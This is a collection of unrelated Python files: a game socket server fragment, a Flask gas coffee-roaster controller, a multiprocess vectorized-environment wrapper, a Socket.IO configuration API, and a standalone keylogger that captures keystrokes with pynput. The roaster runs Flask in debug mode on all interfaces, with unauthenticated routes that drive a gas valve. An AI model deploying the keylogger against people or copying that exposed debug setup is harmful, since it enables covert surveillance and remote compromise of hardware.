waiter_thread = threading.Thread(target=wait_for_connections, daemon=True)
waiter_thread.start()
return server
def start_viewer_server(port: int, game: Game) -> socketserver.BaseServer:
'''
Start a socket server for the players to connect to
Args:
port: port to connect to viewer on
game: The game information that is being run
use_docker bool: whether to use docker or not
Return:
server_thread: The connection so it can be closed by parent functions at
the appropriate time
'''
# Create handler for mangaing each connections to server
receive_handler = create_receive_handler(game, {}, False, False)
# Start server
server = socketserver.ThreadingTCPServer(('localhost', port), receive_handler)
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
server_thread.start()
return server
|
bigroaster.py
|
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#
# Copyright (c) 2017-2018 Mark Juric
# Copyright (c) 2012-2015 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# or impLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import time, random, os
import sys
from flask import Flask, render_template, request, jsonify, json
import xml.etree.ElementTree as ET
import Roaster
from multiprocessing import Queue, Pipe, Process, current_process
from Queue import Full
from pid import pidpy as PIDController
import logging
from logging.handlers import RotatingFileHandler
global paramConn # pipe between tempControlProc and web server for passing POST'd params
global myRoasterObj
roastTime = 0
posted = False
statusQ = None # Queue to pass temp readings and settings between browser and us
tempQueue = Queue(2) # Queue to pass temp sensor data between tempControlProc and us
DEBUG = 0
app = Flask(__name__, template_folder='templates')
#Parameters that are used in the temperature control process
class param:
status = {
"tempSensors" : [],
"gasValve" : [],
"temp" : "0",
"tempUnits" : "F",
"elapsed" : "0",
"mode" : "off",
"sampleTime" : 2.0,
"gasOutput" : 0.0,
"set_point" : 0.0,
"num_pnts_smooth" : 5,
# "k_param" : 44,
# "i_param" : 165,
# "d_param" : 4
"k_param" : 1.2,
"i_param" : 1,
"d_param" : 0.001,
"sampleRate" : 500,
"checkInRate" : 20,
"roasterRotation" : 0,
"roasterTilt" : 0,
"roasterFullness" : 50,
}
roast = {
"ambient" : { "ramp": '', "finaltemp": 70, "time": '' },
"drying" : { "ramp": '', "finaltemp": '', "time": '' },
"development" : { "ramp": '', "finaltemp": '', "time": '' },
"finish" : { "ramp": '', "finaltemp": 267, "time": '' },
}
config = {
"tempUnits" : "F",
"template": '',
"rootDir": '',
"roasterId": -1,
"servoId": -1,
"servoDriver": '',
"servoDelay": 0.1,
"servoStepPin": -1,
"servoDirPin": -1,
"servoMS1Pin": -1,
"servoMS2Pin": -1,
"servoHomePin": -1,
"servoSteps": -1,
"servoStepsPer": -1,
"valveMaxTurns": -1,
"valveSafeLow": -1,
}
# main web page
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
#render main page
print param.status
return render_template(template_name, mode = param.status["mode"], set_point = param.status["set_point"], \
gasOutput = param.status["gasOutput"], sampleTime = param.status["sampleTime"], \
k_param = param.status["k_param"], i_param = param.status["i_param"], \
d_param = param.status["d_param"], \
tempSensors = param.status["tempSensors"], gasValve = param.status["gasValve"],\
sampleRate = param.status["sampleRate"], checkInRate = param.status["checkInRate"],\
ambient_finaltemp = param.roast["ambient"]["finaltemp"],\
drying_ramp = param.roast["drying"]["ramp"],\
drying_finaltemp = param.roast["drying"]["finaltemp"],\
drying_time = param.roast["drying"]["time"],\
development_ramp = param.roast["development"]["ramp"],\
development_finaltemp = param.roast["development"]["finaltemp"],\
development_time = param.roast["development"]["time"],\
finish_ramp = param.roast["finish"]["ramp"],\
finish_finaltemp = param.roast["finish"]["finaltemp"],\
finish_time = param.roast["finish"]["time"])
else:
return 'OK'
#post roasting profiles
@app.route('/postprofile', methods=['POST'])
def postprofile():
if request.json is not None:
param.roast = request.json
for val in request.form:
print val, " ", request.form[val]
print "ME SHARTS!"
return 'OK'
# make sure our temp board is doing what we want
@app.route('/checkin', methods=['GET'])
def checkin():
return jsonify({"sampleRate": str(param.status["sampleRate"]), "checkInRate": str(param.status["checkInRate"])})
# check-in with the temperature probe
@app.route('/postsensors', methods=['POST'])
def postsensors():
global posted
content = request.get_json()
if not posted:
initialize(content)
posted = True
if tempQueue.full():
print "Queue full. Scrapping data"
tempQueue.get()
tempQueue.put(content)
print "Posting to tempQueue: ", content, " and now queue length is ", tempQueue.qsize()
return 'JSON posted'
#post params (selectable temp sensor number)
@app.route('/postparams/<sensorNum>', methods=['POST'])
def postparams(sensorNum=None):
global paramConn
param.status["mode"] = request.form["mode"]
param.status["set_point"] = float(request.form["setpoint"])
param.status["gasOutput"] = float(request.form["dutycycle"]) #is boil duty cycle if mode == "boil"
param.status["sampleTime"] = float(request.form["cycletime"])
param.status["num_pnts_smooth"] = int(request.form.get("numPntsSmooth", param.status["num_pnts_smooth"]))
param.status["k_param"] = float(request.form["k"])
param.status["i_param"] = float(request.form["i"])
param.status["d_param"] = float(request.form["d"])
#send to main temp control process
#if did not receive variable key value in POST, the param class default is used
paramConn.send(param.status)
return 'OK'
#get status from from roaster
@app.route('/getstatus') #only GET
def getstatus(roasterNum=1):
global statusQ
# blocking receive - current status
print "param.status: ", param.status
try:
param.status = statusQ.get(timeout=param.status["sampleRate"]/1000.0)
except:
pass
return jsonify(**param.status)
def initialize(sensorPost):
global statusQ
global paramConn
# We've never checked in before. Do some work
## Is it possible to change this on the fly? Do we care?
numSensors = len(sensorPost["probes"])
param.status["tempSensors"] = []
param.status["tempUnits"] = param.config["tempUnits"]
# Look for roasters
myRoasterObj = Roaster.Roaster(param.config["roasterId"])
for i in range(numSensors):
tempSensorId = sensorPost["probes"][i]["number"]
myRoasterObj.addTempSensor(tempSensorId,str(tempSensorId),"MAX31855","hardware")
#myRoasterObj.addTempSensor(tempSensorId)
param.status["tempSensors"].append([tempSensorId,str(tempSensorId),0])
# grab our gas servo
servoId = param.config["servoId"]
driver = param.config["servoDriver"]
delay = param.config["servoDelay"]
step = param.config["servoStepPin"]
direction = param.config["servoDirPin"]
ms1 = param.config["servoMS1Pin"]
ms2 = param.config["servoMS2Pin"]
home = param.config["servoHomePin"]
steps = param.config["servoSteps"]
stepsPer = param.config["servoStepsPer"]
# get our valve info
maxTurns = param.config["valveMaxTurns"]
safeLow = param.config["valveSafeLow"]
param.status["gasValve"] = [servoId,safeLow,0]
myRoasterObj.addGasServo(servoId,driver,delay,step,direction,ms1,ms2,home,maxTurns,safeLow,steps,stepsPer)
myGasServo = myRoasterObj.getGasServo()
statusQ = Queue(2) # blocking queue
paramConn, childParamConn = Pipe()
p = Process(name = "tempControlProc", target=tempControlProc, args=(tempQueue, myRoasterObj, param.status, childParamConn))
p.start()
myGasServo.home()
def getRoastTime():
return (time.time() - roastTime)
# Stand Alone Heat Process using GPIO
def heatProcGPIO(conn, sampleTime, gasOutput, myGasServo):
p = current_process()
print('Starting:', p.name, p.pid)
while (True):
while (conn.poll()): #get last
sampleTime, gasOutput = conn.recv()
myGasServo.setGasOutput(gasOutput)
conn.send([sampleTime, gasOutput])
time.sleep(sampleTime)
def unPackParamInitAndPost(paramStatus):
#temp = paramStatus["temp"]
tempUnits = paramStatus["tempUnits"]
#elapsed = paramStatus["elapsed"]
mode = paramStatus["mode"]
sampleTime = paramStatus["sampleTime"]
gasOutput = paramStatus["gasOutput"]
set_point = paramStatus["set_point"]
num_pnts_smooth = paramStatus["num_pnts_smooth"]
k_param = paramStatus["k_param"]
i_param = paramStatus["i_param"]
d_param = paramStatus["d_param"]
return tempUnits, mode, sampleTime, gasOutput, set_point, num_pnts_smooth, \
k_param, i_param, d_param
def packParamGet(temp, tempUnits, elapsed, mode, sampleTime, gasOutput, set_point, \
num_pnts_smooth, k_param, i_param, d_param, tempSensors, gasValve, rotation):
param.status["temp"] = temp
param.status["tempUnits"] = tempUnits
param.status["elapsed"] = elapsed
param.status["mode"] = mode
param.status["sampleTime"] = sampleTime
param.status["gasOutput"] = gasOutput
param.status["set_point"] = set_point
param.status["num_pnts_smooth"] = num_pnts_smooth
param.status["k_param"] = k_param
param.status["i_param"] = i_param
param.status["d_param"] = d_param
param.status["tempSensors"] = tempSensors
param.status["gasValve"] = gasValve
param.status["roasterRotation"] = rotation
return param.status
# Main Temperature Control Process
def tempControlProc(tempQ, myRoaster, paramStatus, childParamConn):
oldMode = ''
tempUnits, mode, sampleTime, gasOutput, set_point, num_pnts_smooth, \
k_param, i_param, d_param = unPackParamInitAndPost(paramStatus)
oldMode = mode
p = current_process()
print('Starting:', p.name, p.pid)
# Pipe to communicate with "Heat Process"
parentHeat, c = Pipe()
# Start Heat Process
# Fix this. What do sampleTime and gasOutput do here?
pheat = Process(name = "heatProcGPIO", target=heatProcGPIO, args=(c, sampleTime, gasOutput, myRoaster.getGasServo()))
pheat.daemon = True
pheat.start()
# Get our PID ready
readyPIDcalc = False
# Temperature smoothing list
tempMovingAverageList = []
tempMovingAverage = 0.0
slopeMovingAverageList = []
slopeMovingAverage = 0.0
while(True):
readytemp = False
tempSensorsParam = []
gasServoParam = []
while not tempQ.empty():
try:
sensorInfo = tempQ.get()
except e:
print "tempQ was empty even when we said it wasn't. WTF."
# This loop is not done. In here is where we have to figure out
# which probe to pay attention to.
# Rotation applies to probe 1.
# Face down: π
# Face up: 0..2*π
# Battery side (esp8266 up): π/2
# Back side (esp8266 up): 1.5*π
rotation = sensorInfo["position"]["rotation"]
for sensor in sensorInfo["probes"]:
temp_C = sensor["temp"]
elapsed = sensor["elapsed"] / 1000.0
tempSensorNum = sensor["number"]
if temp_C == -99:
print("Bad Temp Reading - retry")
continue
if (tempUnits == 'F'):
temp = (9.0/5.0)*temp_C + 32
else:
temp = temp_C
temp_str = "%3.2f" % temp
readytemp = True
tempSensorsParam.append([tempSensorNum,tempSensorNum,temp_str])
if readytemp == True:
if mode == "auto":
tempMovingAverageList.append({"temp":temp,"timestamp":time.time()})
# smooth data
tempMovingAverage = 0.0 # moving avg init
slopeMovingAverage = 0.0
while (len(tempMovingAverageList) > num_pnts_smooth):
tempMovingAverageList.pop(0) # remove oldest elements in list
while (len(slopeMovingAverageList) > num_pnts_smooth-1):
slopeMovingAverageList.pop(0) # slopeMovingAverage is one less because it's a diff
for temp_pnt in tempMovingAverageList:
tempMovingAverage += temp_pnt["temp"]
tempMovingAverage /= len(tempMovingAverageList)
# Now, compute the moving average of the slope
# We need at least two values to compute a difference
if len(tempMovingAverageList) > 1:
i = 0
while i < len(tempMovingAverageList)-1:
diff = tempMovingAverageList[i+1]["temp"] - tempMovingAverageList[i]["temp"]
slope = diff / (tempMovingAverageList[i+1]["timestamp"] - tempMovingAverageList[i]["timestamp"])
slopeMovingAverage =+ slope
i += 1
slopeMovingAverage /= len(tempMovingAverageList)
# print "len(tempMovingAverageList) = %d" % len(tempMovingAverageList)
# print "Num Points smooth = %d" % num_pnts_smooth
# print "tempMovingAverage = %.2f" % tempMovingAverage
# print tempMovingAverageList
# calculate PID every cycle
if (readyPIDcalc == True):
gasOutput = pid.calcPID_reg4(slopeMovingAverage, set_point, True)
# send to heat process every cycle
if not oldMode == mode:
myRoaster.getGasServo().setToSafeLow()
print "%s changing to %s" %(oldMode,mode)
oldMode = mode
parentHeat.send([sampleTime, gasOutput])
readyPIDcalc = False
gasServoParam = [myRoaster.getGasServo().getServoId(),myRoaster.getGasServo().getSafeLow(),gasOutput]
# put current status in queue
try:
paramStatus = packParamGet(temp_str, tempUnits, elapsed, mode, sampleTime, gasOutput, \
set_point, num_pnts_smooth, k_param, i_param, d_param,tempSensorsParam, gasServoParam, rotation)
statusQ.put(paramStatus) #GET request
except Full:
pass
while (statusQ.qsize() >= 2):
statusQ.get() #remove old status
logdata(tempSensorNum, temp, gasOutput)
if DEBUG:
print("Current Temp: %3.2f deg %s, Heat Output: %3.1f%%" \
% (temp, tempUnits, gasOutput))
while parentHeat.poll(): # Poll Heat Process Pipe
sampleTime, gasOutput = parentHeat.recv() #non blocking receive from Heat Process
readyPIDcalc = True
# Pick up any environment changes
readyPOST = False
while childParamConn.poll(): #POST settings - Received POST from web browser or Android device
paramStatus = childParamConn.recv()
tempUnits, mode, sampleTime, gasOutput_temp, set_point, num_pnts_smooth, \
k_param, i_param, d_param = unPackParamInitAndPost(paramStatus)
readyPOST = True
if readyPOST == True:
if mode == "auto":
print("auto selected")
pid = PIDController.pidpy(sampleTime, k_param, i_param, d_param) #init pid
gasOutput = pid.calcPID_reg4(tempMovingAverage, set_point, True)
# always zero out to lowest safe low before enabled modes
if not oldMode == mode:
myRoaster.getGasServo().setToSafeLow()
parentHeat.send([sampleTime, gasOutput])
if mode == "manual":
print("manual selected (%s and %s)" % (oldMode,mode))
gasOutput = gasOutput_temp
# always zero out to lowest safe low before enabled modes
if not oldMode == mode:
print "setting to safeLow"
myRoaster.getGasServo().setToSafeLow()
parentHeat.send([sampleTime, gasOutput])
if mode == "off":
print("off selected")
# We don't care. Off is off. Always set to off.
myRoaster.getGasServo().setOff()
oldMode = mode
readyPOST = False
time.sleep(0.01)
def logdata(tank, temp, heat):
f = open("roasting" + str(tank) + ".csv", "ab")
if sys.version_info >= (3, 0):
f.write("%3.1f;%3.3f;%3.3f\n".encode("utf8") % (getRoastTime(), temp, heat))
else:
f.write("%3.1f;%3.3f;%3.3f\n" % (getRoastTime(), temp, heat))
f.close()
if __name__ == '__main__':
roastTime = time.time()
# Load up our config
tree = ET.parse('config.xml')
xml_root = tree.getroot()
template_name = xml_root.find('Template').text.strip()
root_dir_elem = xml_root.find('RootDir')
if root_dir_elem is not None:
param.config["rootDir"] = root_dir_elem.text.strip()
os.chdir(param.config["rootDir"])
else:
print("No RootDir tag found in config.xml, running from current directory")
# Retrieve root element from config.xml for parsing
param.config["tempUnits"] = xml_root.find('Temp_Units').text.strip()
# Look for roasters
for roasters in xml_root.iter('Roasters'):
print ("found roasters")
for roaster in roasters:
param.config["roasterId"] = roaster.find('Roaster_Id').text
# grab our gas servo
servo = roaster.find('Servo')
param.config["servoId"] = servo.find('Servo_Id').text
param.config["servoDriver"] = servo.find('Servo_Driver').text
param.config["servoDelay"] = float(servo.find('Servo_Delay').text)
param.config["servoStepPin"] = int(servo.find('Step_Pin').text)
param.config["servoDirPin"] = int(servo.find('Dir_Pin').text)
param.config["servoMS1Pin"] = int(servo.find('MS1_Pin').text)
param.config["servoMS2Pin"] = int(servo.find('MS2_Pin').text)
param.config["servoHomePin"] = int(servo.find('Home_Pin').text)
param.config["servoSteps"] = servo.find('Step').text
param.config["servoStepsPer"] = int(servo.find('Steps_Per_Rotation_Full').text)
# get our valve info
valve = roaster.find('Valve')
param.config["valveMaxTurns"] = int(valve.find('Max_Turns_Ceil').text)
param.config["valveSafeLow"] = int(valve.find('Safe_Low_Percent').text)
logger = logging.getLogger('werkzeug')
handler = logging.FileHandler('access.log')
logger.addHandler(handler)
app.debug = True
app.run(use_reloader=False, host='0.0.0.0')
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import (
CloudpickleWrapper,
VecEnv,
VecEnvIndices,
VecEnvObs,
VecEnvStepReturn,
)
def _worker(
remote: mp.connection.Connection, parent_remote: mp.connection.Connection, env_fn_wrapper: CloudpickleWrapper
) -> None:
# Import here to avoid a circular import
from stable_baselines3.common.env_util import is_wrapped
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "get_coeff_dim":
remote.send((env.coeff_dim))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns: List[Callable[[], gym.Env]], start_method: Optional[str] = None):
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
self.ctx = mp.get_context(start_method)
self.env_fns = env_fns
self.setup()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(("get_coeff_dim", None))
coeff_dim = self.remotes[0].recv()
self.coeff_dim = coeff_dim
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def setup(self):
self.waiting = False
self.closed = False
n_envs = len(self.env_fns)
self.remotes, self.work_remotes = zip(*[self.ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, self.env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = self.ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
# for p in self.processes:
# p.join()
def clean(self):
""" Kill and recreate process """
for p in self.processes:
p.terminate()
p.join()
self.setup()
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self, wrapper_class: Type[gym.Wrapper], indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]], space: gym.spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
keylogger.py
|
# Date: 09/30/2018
# Author: Pure-L0G1C
# Description: Keylogger
from threading import Thread
from pynput.keyboard import Key, Listener
class Keylogger(object):
def __init__(self):
self.data = []
self.lastkey = None
self.listener = None
self.is_alive = True
self.num_to_symbol = {
'1': '!', '2': '@', '3': '#', '4': '$', '5': '%',
'6': '^', '7': '&', '8': '*', '9': '(', '0': ')'
}
self.sym_to_symbol = {
'`': '~', ',': '<', '.': '>', '/': '?', '\'': '\"', '\\': '|',
';': ':', '[': '{', ']': '}', '-': '_', '=': '+'
}
def _start(self):
with Listener(on_press=self.on_press, on_release=self.on_release) as self.listener:
self.listener.join()
def start(self):
Thread(target=self._start, daemon=True).start()
def stop(self):
self.listener.stop()
self.is_alive = False
def dump(self):
data = ''
if not self.is_empty():
data = ''.join(self.data)
print(data)
self.data = []
return data if data else '-1'
def on_release(self, key):
if any([key == Key.shift, key == Key.shift_r]):
self.lastkey = None
def on_press(self, key):
value = None
if key == Key.backspace:
if len(self.data):
del self.data[-1]
elif key == Key.tab:
value = '\t'
elif key == Key.enter:
value = '\n'
elif key == Key.space:
value = ' '
elif len(str(key)) == 3:
value = self.check_for_shift(key)
else:
self.lastkey = key
if value != None:
self.data.append(value)
def check_for_shift(self, key):
key = key.char
if any([self.lastkey == Key.shift, self.lastkey == Key.shift_r]):
key = (key.upper() if key.isalpha() else self.num_to_symbol[key] if
key.isdigit() else self.sym_to_symbol[key] if key in self.sym_to_symbol else key)
return key
def is_empty(self):
is_empty = True
for data in self.data:
if data.strip():
is_empty = False
break
return is_empty
|
instanceConfiguration_api.py
|
from flask.ext.socketio import emit
from src.model import (ToggleKinectEnable, GetKinectEnable)
from src.model.InstanceConfiguration import InstanceConfiguration
from src.server import socketio
from time import sleep
import threading
@socketio.on('create_instance_configuration')
def create_instance_configuration(details):
"""
Create an instance configuration
:param details: object details about the instance configuration
:param details["sessionId"] string id of a session
:param details["userId"] string id of a user
:param details["cameraHost"] string host of the camera
:param details["cameraPort"] integer port of the camera
:param details["kinectHost"] string host of the kinect
:param details["kinectPort"] integer port of the kinect
:param details["topLeft"] object details about the topLeft calibration coordinate (Optional)
:param details["topLeft"]["x"] integer the X coordinate of the topLeft point
:param details["topLeft"]["y"] integer the Y coordinate of the topLeft point
:param details["topRight"] object details about the topRight calibration coordinate (Optional)
:param details["topRight"]["x"] integer the X coordinate of the topRight point
:param details["topRight"]["y"] integer the Y coordinate of the topRight point
:param details["bottomLeft"] object details about the bottomLeft calibration coordinate (Optional)
:param details["bottomLeft"]["x"] integer the X coordinate of the bottomLeft point
:param details["bottomLeft"]["y"] integer the Y coordinate of the bottomLeft point
:param details["bottomRight"] object details about the bottomRight calibration coordinate (Optional)
:param details["bottomRight"]["x"] integer the X coordinate of the bottomRight point
:param details["bottomRight"]["y"] integer the Y coordinate of the bottomRight point
:return: an instance configuration object eg:
{
"id": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"sessionId": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"userId": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
"kinect": {
"host": "localhost",
"port": 8080,
},
"camera": {
"host": "localhost",
"port": "8080",
},
"topLeft": {
"x": 0,
"y": 100
},
"topRight": {
"x": 0,
"y": 100
},
"bottomRight": {
"x": 0,
"y": 100
},
"bottomLeft": {
"x": 0,
"y": 100
}
}
"""
config = InstanceConfiguration(sessionId=details["sessionId"],
userId=details["userId"],
cameraHost=details["camera"]["host"],
cameraPort=details["camera"]["port"],
kinectHost=details["kinect"]["host"],
kinectPort=details["kinect"]["port"],
topLeftX=details["topLeft"]["x"] if "topLeft" in details else None,
topLeftY=details["topLeft"]["y"] if "topLeft" in details else None,
topRightX=details["topRight"]["x"] if "topRight" in details else None,
topRightY=details["topRight"]["y"] if "topRight" in details else None,
bottomRightX=details["bottomRight"]["x"] if "bottomRight" in details else None,
bottomRightY=details["bottomRight"]["y"] if "bottomRight" in details else None,
bottomLeftX=details["bottomLeft"]["x"] if "bottomLeft" in details else None,
bottomLeftY=details["bottomLeft"]["y"] if "bottomLeft" in details else None,
kinectTopLeftX=details["kinectTopLeft"]["x"] if "kinectTopLeft" in details else None,
kinectTopLeftY=details["kinectTopLeft"]["y"] if "kinectTopLeft" in details else None,
kinectTopRightX=details["kinectTopRight"]["x"] if "kinectTopRight" in details else None,
kinectTopRightY=details["kinectTopRight"]["y"] if "kinectTopRight" in details else None,
kinectBottomRightX=details["kinectBottomRight"]["x"] if "kinectBottomRight" in details else None,
kinectBottomRightY=details["kinectBottomRight"]["y"] if "kinectBottomRight" in details else None,
kinectBottomLeftX=details["kinectBottomLeft"]["x"] if "kinectBottomLeft" in details else None,
kinectBottomLeftY=details["kinectBottomLeft"]["y"] if "kinectBottomLeft" in details else None,
)
emit('create_instance_configuration', config.create().as_object())
@socketio.on('get_instance_configurations')
def get_instance_configurations():
emit('get_instance_configurations', [cfg.as_object() for cfg in InstanceConfiguration.get_all()])
@socketio.on('delete_instance_configuration')
def delete_instance_configuration(configurationId):
emit('delete_instance_configuration', InstanceConfiguration.get(configurationId).delete())
@socketio.on('update_instanceConfig')
def update_instanceConfig(id, details):
print(id)
print(details)
config = InstanceConfiguration.get(id=id)
config.sessionId = details["sessionId"]
config.userId = details["userId"]
config.cameraHost = details["camera"]["host"]
config.cameraPort = details["camera"]["port"]
config.kinectHost = details["kinect"]["host"]
config.kinectPort = details["kinect"]["port"]
config.topLeftX = details["topLeft"]["x"] if "topLeft" in details else None
config.topLeftY = details["topLeft"]["y"] if "topLeft" in details else None
config.topRightX = details["topRight"]["x"] if "topRight" in details else None
config.topRightY = details["topRight"]["y"] if "topRight" in details else None
config.bottomRightX = details["bottomRight"]["x"] if "bottomRight" in details else None
config.bottomRightY = details["bottomRight"]["y"] if "bottomRight" in details else None
config.bottomLeftX = details["bottomLeft"]["x"] if "bottomLeft" in details else None
config.bottomLeftY = details["bottomLeft"]["y"] if "bottomLeft" in details else None
config.kinectTopLeftX = details["kinectTopLeft"]["x"] if "kinectTopLeft" in details else None
config.kinectTopLeftY = details["kinectTopLeft"]["y"] if "kinectTopLeft" in details else None
config.kinectTopRightX = details["kinectTopRight"]["x"] if "kinectTopRight" in details else None
config.kinectTopRightY = details["kinectTopRight"]["y"] if "kinectTopRight" in details else None
config.kinectBottomRightX = details["kinectBottomRight"]["x"] if "kinectBottomRight" in details else None
config.kinectBottomRightY = details["kinectBottomRight"]["y"] if "kinectBottomRight" in details else None
config.kinectBottomLeftX = details["kinectBottomLeft"]["x"] if "kinectBottomLeft" in details else None
config.kinectBottomLeftY = details["kinectBottomLeft"]["y"] if "kinectBottomLeft" in details else None
emit('update_instanceConfig', config.update().as_object())
@socketio.on('update_instanceConfig_coords')
def update_instanceConfig_coords(id, data):
config = InstanceConfiguration.get(id=id)
config.topLeftX = data["topLeft"]["x"]
config.topLeftY = data["topLeft"]["y"]
config.topRightX = data["topRight"]["x"]
config.topRightY = data["topRight"]["y"]
config.bottomRightX = data["bottomRight"]["x"]
config.bottomRightY = data["bottomRight"]["y"]
config.bottomLeftX = data["bottomLeft"]["x"]
config.bottomLeftY = data["bottomLeft"]["y"]
config.update()
@socketio.on('update_instanceConfig_kinectCoords')
def update_instanceConfig_coords(id, data):
